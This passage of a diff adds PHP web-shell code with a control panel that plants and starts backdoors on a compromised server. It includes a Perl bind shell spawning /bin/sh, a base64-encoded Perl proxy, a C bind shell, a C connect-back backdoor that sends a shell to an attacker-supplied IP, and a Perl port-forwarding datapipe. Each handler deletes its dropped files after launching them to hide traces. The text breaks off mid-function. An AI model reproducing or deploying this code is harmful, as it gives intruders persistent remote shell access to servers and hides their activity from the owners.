+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêğûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïğåğâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïğîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïğîøåë óñïåøíî, çàêğûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ğåäèğåêò íà \$o->{'tohost'}, ïîğò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïğåğâàí ğåäèğåêò íà %s, ïîğò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïğåğâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëş÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïğè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïğîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
